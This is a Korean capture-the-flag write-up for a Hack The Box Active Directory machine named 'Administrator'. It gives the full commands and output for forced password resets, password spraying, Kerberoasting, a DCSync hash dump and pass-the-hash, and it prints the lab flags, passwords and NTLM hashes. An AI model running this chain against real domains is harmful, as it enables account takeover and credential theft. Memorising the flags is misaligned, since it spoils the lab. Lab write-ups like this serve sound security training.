Proof of Concept

10.129.4.202

Nmap

PORT     STATE SERVICE
21/tcp   open  ftp
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

Information Gathering

hosts 정보 수집

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.4.202 -u 'Olivia' -p 'ichliebedich' --generate-hosts-file hosts
SMB         10.129.4.202    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.4.202    445    DC               [+] administrator.htb\Olivia:ichliebedich
 
┌──(kali㉿kali)-[~/Administrator]
└─$ cat hosts
10.129.4.202     DC.administrator.htb administrator.htb DC

/etc/hosts 파일 설정

┌──(kali㉿kali)-[~/Administrator]
└─$ cat /etc/hosts
<SNIP>
10.129.4.202     DC.administrator.htb administrator.htb DC

BloodHound 정보 수집

┌──(kali㉿kali)-[~/Administrator]
└─$ bloodhound-python -d 'administrator.htb' -u 'Olivia' -p 'ichliebedich' -ns 10.129.4.202 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.administrator.htb
<SNIP>
INFO: Querying computer: dc.administrator.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc00000ac - STATUS_PIPE_NOT_AVAILABLE - An instance of a named pipe cannot be found in the listening state.
INFO: Done in 00M 32S
INFO: Compressing output into 20260128173820_bloodhound.zip

Initial Access

Olivia / ichliebedich

주어진 계정으로 winrm 인증 성공

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc winrm 10.129.4.202 -u 'Olivia' -p 'ichliebedich'
WINRM       10.129.4.202    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.4.202    5985   DC               [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)

winrm 접속

┌──(kali㉿kali)-[~/Administrator]
└─$ evil-winrm -i 10.129.4.202 -u 'Olivia' -p 'ichliebedich'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents>

Auth as MICHAEL

Checked BloodHound

The user OLIVIA@ADMINISTRATOR.HTB has GenericAll permissions to the user MICHAEL@ADMINISTRATOR.HTB.
The GenericAll permission grants OLIVIA@ADMINISTRATOR.HTB the ability to change the password of the user MICHAEL@ADMINISTRATOR.HTB without knowing their current password. This is equivalent to the “ForceChangePassword” edge in BloodHound.

MICHAEL 계정 비밀번호를 “1q2w3e4r”로 변경

┌──(kali㉿kali)-[~/Administrator]
└─$ bloodyAD -d 'administrator.htb' -u 'Olivia' -p 'ichliebedich' --host administrator.htb set password MICHAEL 1q2w3e4r
[+] Password changed successfully!

변경된 비밀번호로 SMB 인증 성공

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.4.202 -u 'michael' -p '1q2w3e4r'
SMB         10.129.4.202    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.4.202    445    DC               [+] administrator.htb\michael:1q2w3e4r

Auth as BENJAMIN

Checked BloodHound

The user MICHAEL@ADMINISTRATOR.HTB has the capability to change the user BENJAMIN@ADMINISTRATOR.HTB’s password without knowing that user’s current password.

BENJAMIN 계정 비밀번호를 “1q2w3e4r”로 변경

┌──(kali㉿kali)-[~/Administrator]
└─$ bloodyAD -d 'administrator.htb' -u 'MICHAEL' -p '1q2w3e4r' --host administrator.htb set password BENJAMIN 1q2w3e4r
[+] Password changed successfully!

변경된 비밀번호로 SMB 인증 성공

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.4.202 -u 'benjamin' -p '1q2w3e4r'
SMB         10.129.4.202    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.4.202    445    DC               [+] administrator.htb\benjamin:1q2w3e4r

Auth as EMILY

benjamin:1q2w3e4r으로 FTP 인증 성공

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc ftp administrator.htb -u users.txt -p '1q2w3e4r' -t 100 --continue-on-success
FTP         10.129.4.202    21     administrator.htb [-] Administrator:1q2w3e4r (Response:530 User cannot log in.)
FTP         10.129.4.202    21     administrator.htb [-] Guest:1q2w3e4r (Response:530 User cannot log in.)
FTP         10.129.4.202    21     administrator.htb [-] krbtgt:1q2w3e4r (Response:530 User cannot log in.)
FTP         10.129.4.202    21     administrator.htb [-] olivia:1q2w3e4r (Response:530 User cannot log in.)
FTP         10.129.4.202    21     administrator.htb [-] michael:1q2w3e4r (Response:530 User cannot log in, home directory inaccessible.)
FTP         10.129.4.202    21     administrator.htb [+] benjamin:1q2w3e4r

benjamin 계정으로 FTP 접속

┌──(kali㉿kali)-[~/Administrator]
└─$ ftp 10.129.4.202
Connected to 10.129.4.202.
220 Microsoft FTP Service
Name (10.129.4.202:kali): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

FTP 서버에서 get Backup.psafe3 파일 발견

ftp> ls
229 Entering Extended Passive Mode (|||49764|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
 
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||49767|)
125 Data connection already open; Transfer starting.
100% |**********************************************|   952        4.47 KiB/s    00:00 ETA226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (4.46 KiB/s)

Backup.psafe3를 크랙하여 비밀번호 획득 성공

tekieromucho

┌──(kali㉿kali)-[~/Administrator]
└─$ hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt --quiet
Backup.psafe3:tekieromucho

Password Safe를 사용해서 Backup.psafe3 파일 확인한 결과, Emily 비밀번호 발견

UXLCI5iETUsIBoFVTj8yQFKoHjXmb

emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb으로 SMB 인증 성공

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.4.202 -u users.txt -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -t 100
SMB         10.129.4.202    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.4.202    445    DC               [-] administrator.htb\Administrator:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.129.4.202    445    DC               [-] administrator.htb\Guest:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.129.4.202    445    DC               [-] administrator.htb\krbtgt:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.129.4.202    445    DC               [-] administrator.htb\olivia:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.129.4.202    445    DC               [-] administrator.htb\michael:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.129.4.202    445    DC               [-] administrator.htb\benjamin:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.129.4.202    445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

emily/UXLCI5iETUsIBoFVTj8yQFKoHjXmb으로 winrm 인증 성공

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc winrm 10.129.4.202 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
WINRM       10.129.4.202    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.4.202    5985   DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb (Pwn3d!)

emily 계정으로 winrm 접속 성공

┌──(kali㉿kali)-[~/Administrator]
└─$ evil-winrm -i 10.129.4.202 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents>

Read user.txt

*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
ip219ac16f8ab8dec9d35e16bda64ff3a3
*Evil-WinRM* PS C:\Users\emily\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.4.202
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

Privilege Escalation

Checked BloodHound

The user EMILY@ADMINISTRATOR.HTB has generic write access to the user ETHAN@ADMINISTRATOR.HTB.
Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user

Kerberoasting을 수행하여 ethan 계정의 TGS 티켓 해시 추출

┌──(kali㉿kali)-[~/Administrator]
└─$ python targetedKerberoast.py -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip 10.129.4.202 -o hash.txt
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Writing hash to file for (ethan)
 
┌──(kali㉿kali)-[~/Administrator]
└─$ cat hash.txt
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$0a9fbc866864f694110383e06dbdf6a1$234efc125b3c197d7d37eafd24eaa335859fff536f388969f025b171e48d6f9a3eb54d117928106163f4d50e789e0f84724042197e6d704c5655ee71b39b353879398d597fd242d5fd8138068d6ca5ad1a92d53d6b80fd10c2d2a7d8cf4c267813c6a668ce3b9ac44486da79559f67d2cbdd42a6ee0b55ea45efdda7961cea4e8a14f850eadfe63390cdb6ddf78c1cb04426f77d1de783c75b0310f37a11d3b15a5aed9b4b822e93c1162fad131cfa81a87791e2f75999331c1f32a38cd2e8810fac24722deecf3041551cd9e0bda32e4bcbc0a2cb2b7337f2de5fa21228ea9524b7bd13a59d88fe0b3c709684609fb52721a2a706e93c8596242cc14bde2d1363f3cf043bb8deecc605da6aecf5a4972ba88bab3155f6549966c7c1bb4fd1feec62076959981cde2053f38183a7fcec5278946318bdf235249df86e631ad31fc3b565cd9aa0a7316470702c3c89dfdba074a2c920898840dbd03fe47e731fd295fa46384eb2ddd87f24197c78a583272a01043d1035079b3a86a813c69c35acf1fc574054b4d52aee8b6aeb367410d8e99529eeef9723c33be88fb7ed3a63bd3caca683aa0102dd41d41d29f18d1f7c804b764d425ecf3b557449b59deff521cc8b20c2499aaea75e8089843b229255d6817f6436f730a4f6250064a9694b717482af4d6356c6ea365fcd648eccffbb6abb459064a3351039f9369735f3755eca05de732f2c57745584378287fe4845477b5d626d3bbeb5fad4154c9b6ef44d0d0a0b6c913cc6629d5aafedd008fcc1c6b4674795d34cdeee3a4743092c9378bb62e24baabc5895f41ec527c5f800a0497acb105a3a083644c002cd2feb472058292bf248a33371471551451df1afb4fee45dcbe8f390f7c90d09aab247c3cbdc14df9a34cc368d9e1db9043cbaa5f412543b5ed3017dd231f0ecc64d5004270c42899c30871d37e053738e294e406a77a44ac63bfd54289df32929575f3213c4a3accd58cc48a19cf680aad4787781e0df2ea35450aa8530ffc4fd6cc28f2563eaf719e8f537857634f6913828126218bc6fb18870272be9a8b6a34e9379dce49fee9043e73ef5241806586775f4a04e81864fc57f3b3aa2a0116b387e64a70840d1dba3ecdb5c3873d190c775832c8d920f0be1474aae079150cb68823d4fff7bb3db46430ddf8685799f4ad2220a6bb311ee18f98091859866691836b12bcee8d5cf0b4e924eecd15fe08fefed488e8bc43f984d7b48bb3c66d8542779c25d11c5018c045e4e76bec2aefe97a6a1386dde40b1cbb71a044818a6443dd5b8f37d204d8d9c8e587c23922add1612dcb7db6e3162a4874363926d6d453eda1c1b710ae31761828c7ad351e2d60f3d9e4893f8e3299d5f3f98a35cd8d2708336eb381a4d0966f5f35349d83bc0e53f547d7d184d3cd90f15ae145ed12df796b05bb1bb8de81cf4668c33369368d83c7ec97dcdd1f8d9492141da2531a3b32b8d00408317010a8aa13f7c3650f3c0cbcb1825dc43e3346352206d502ac68a43

해시 크랙해서 평문 비밀번호 획득

limpbizkit

┌──(kali㉿kali)-[~/Administrator]
└─$ hashcat hash.txt /usr/share/wordlists/rockyou.txt --quiet
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
 
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
 
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
 
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$0a9fbc866864f694110383e06dbdf6a1$234efc125b3c197d7d37eafd24eaa335859fff536f388969f025b171e48d6f9a3eb54d117928106163f4d50e789e0f84724042197e6d704c5655ee71b39b353879398d597fd242d5fd8138068d6ca5ad1a92d53d6b80fd10c2d2a7d8cf4c267813c6a668ce3b9ac44486da79559f67d2cbdd42a6ee0b55ea45efdda7961cea4e8a14f850eadfe63390cdb6ddf78c1cb04426f77d1de783c75b0310f37a11d3b15a5aed9b4b822e93c1162fad131cfa81a87791e2f75999331c1f32a38cd2e8810fac24722deecf3041551cd9e0bda32e4bcbc0a2cb2b7337f2de5fa21228ea9524b7bd13a59d88fe0b3c709684609fb52721a2a706e93c8596242cc14bde2d1363f3cf043bb8deecc605da6aecf5a4972ba88bab3155f6549966c7c1bb4fd1feec62076959981cde2053f38183a7fcec5278946318bdf235249df86e631ad31fc3b565cd9aa0a7316470702c3c89dfdba074a2c920898840dbd03fe47e731fd295fa46384eb2ddd87f24197c78a583272a01043d1035079b3a86a813c69c35acf1fc574054b4d52aee8b6aeb367410d8e99529eeef9723c33be88fb7ed3a63bd3caca683aa0102dd41d41d29f18d1f7c804b764d425ecf3b557449b59deff521cc8b20c2499aaea75e8089843b229255d6817f6436f730a4f6250064a9694b717482af4d6356c6ea365fcd648eccffbb6abb459064a3351039f9369735f3755eca05de732f2c57745584378287fe4845477b5d626d3bbeb5fad4154c9b6ef44d0d0a0b6c913cc6629d5aafedd008fcc1c6b4674795d34cdeee3a4743092c9378bb62e24baabc5895f41ec527c5f800a0497acb105a3a083644c002cd2feb472058292bf248a33371471551451df1afb4fee45dcbe8f390f7c90d09aab247c3cbdc14df9a34cc368d9e1db9043cbaa5f412543b5ed3017dd231f0ecc64d5004270c42899c30871d37e053738e294e406a77a44ac63bfd54289df32929575f3213c4a3accd58cc48a19cf680aad4787781e0df2ea35450aa8530ffc4fd6cc28f2563eaf719e8f537857634f6913828126218bc6fb18870272be9a8b6a34e9379dce49fee9043e73ef5241806586775f4a04e81864fc57f3b3aa2a0116b387e64a70840d1dba3ecdb5c3873d190c775832c8d920f0be1474aae079150cb68823d4fff7bb3db46430ddf8685799f4ad2220a6bb311ee18f98091859866691836b12bcee8d5cf0b4e924eecd15fe08fefed488e8bc43f984d7b48bb3c66d8542779c25d11c5018c045e4e76bec2aefe97a6a1386dde40b1cbb71a044818a6443dd5b8f37d204d8d9c8e587c23922add1612dcb7db6e3162a4874363926d6d453eda1c1b710ae31761828c7ad351e2d60f3d9e4893f8e3299d5f3f98a35cd8d2708336eb381a4d0966f5f35349d83bc0e53f547d7d184d3cd90f15ae145ed12df796b05bb1bb8de81cf4668c33369368d83c7ec97dcdd1f8d9492141da2531a3b32b8d00408317010a8aa13f7c3650f3c0cbcb1825dc43e3346352206d502ac68a43:limpbizkit

impacket-secretsdump로 해시 덤프하여 administrator 계정 NTLM 해시 획득

3dc553ce4b9fd20bd016e098d2d2fd2e

┌──(kali㉿kali)-[~/Administrator]
└─$ impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.4.202
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:68365827d79c4f5cc9b52b688495fd51:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:68365827d79c4f5cc9b52b688495fd51:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
<SNIP>

획득한 NTLM 해시로 SMB, WinRM 인증 성공

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.4.202 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
SMB         10.129.4.202    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.4.202    445    DC               [+] administrator.htb\administrator:3dc553ce4b9fd20bd016e098d2d2fd2e (Pwn3d!)
 
┌──(kali㉿kali)-[~/Administrator]
└─$ nxc winrm 10.129.4.202 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
WINRM       10.129.4.202    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.4.202    5985   DC               [+] administrator.htb\administrator:3dc553ce4b9fd20bd016e098d2d2fd2e (Pwn3d!)

WinRM 접속

┌──(kali㉿kali)-[~/Administrator]
└─$ evil-winrm -i 10.129.4.202 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents

Read root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
79665f605a832f81f8947e3fc9f6e19d
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.4.202
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

KalioNix

Explorer

Administrator

Proof of Concept

10.129.4.202

Nmap

Information Gathering

Initial Access

Auth as MICHAEL

Auth as BENJAMIN

Auth as EMILY

Privilege Escalation

Table of Contents